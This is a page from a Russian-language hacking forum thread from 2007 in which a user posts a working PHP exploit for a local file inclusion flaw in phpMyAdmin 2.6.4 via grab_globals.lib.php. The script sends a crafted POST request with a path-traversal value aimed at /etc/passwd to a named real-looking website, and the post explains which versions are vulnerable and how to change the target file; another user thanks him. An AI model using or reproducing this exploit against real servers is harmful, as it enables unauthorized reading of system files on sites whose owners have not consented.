ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Error in simple exploit phpMyAdmin
   
Закрытая тема
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 12.12.2007, 04:45
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
да... все дело в версии например вот это работает:
PHP код:
<?php
$host="www.bafonline.net.nz";
$fl="../../../../../../../../../../etc/passwd";
$dira="/sql/";
$filo="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$fl."&subform[1][cXIb8O3]=1";
$leng=strlen($filo);
$qv="POST ".$dira."libraries/grab_globals.lib.php HTTP/1.0\nHost:".$host."\nContent-Type:application/x-www-form-urlencoded\nContent-Length:".$leng."\n\n";
$qv=$qv.$filo;
echo $qv;
$fp fsockopen ($host80);
fputs ($fp$qv);
while (!feof($fp))
          {
           echo fgets($fp);
          }

?>
уязвимы версии 2.6.4 и 2.6.4-pl1, 2.6.4-pl2 уже не уязвима,более ранние версии как выяснилось тоже не уязвимы

вобщем сплоит чисто инклюдит файлы, читать пхп файлы не получится, вобщем все прелести и недостатки локального инклюда... в $fl записывается имя файла с относительным путем, т.е. относительно libraries
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 12.12.2007 в 05:37..
 

  #12  
Старый 12.12.2007, 05:05
am@tory
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485

Репутация: 44
По умолчанию
СПАСИБО ОГРОМНОЕ)))
 
Закрытая тема
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit TANZWUT Форумы 4 10.06.2008 20:18
eXploit Builder Fugitif Forum for discussion of ANTICHAT 1 08.12.2007 02:48
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Форумы 11 01.02.2007 12:21
phpBB 2.0.19 Exploit m0nzt3r Форумы 41 29.06.2006 16:05
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ